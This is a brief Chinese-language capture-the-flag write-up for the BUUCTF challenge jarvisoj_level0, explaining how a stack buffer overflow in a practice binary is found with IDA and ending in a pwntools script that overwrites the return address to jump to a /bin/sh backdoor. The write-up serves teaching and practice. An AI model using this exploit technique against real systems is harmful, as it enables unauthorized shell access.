[BUUCTF]PWN8——jarvisoj_level0
题目网址:https://buuoj.cn/challenges#jarvisoj_level0
步骤:
例行检查,64位,开启了NX保护
nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入
用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh
双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596
根据之前nc看到的字符串,找到了输入点,ida给我们分析出来buf的大小是0x80,这边read读入0x200,可以造成溢出,覆盖返回地址为后门地址既可完成利用
exp
from pwn import*
r=remote('node3.buuoj.cn',25946)
payload='a'*(0x80+8)+p64(0x400596)
r.sendline(payload)
r.interactive()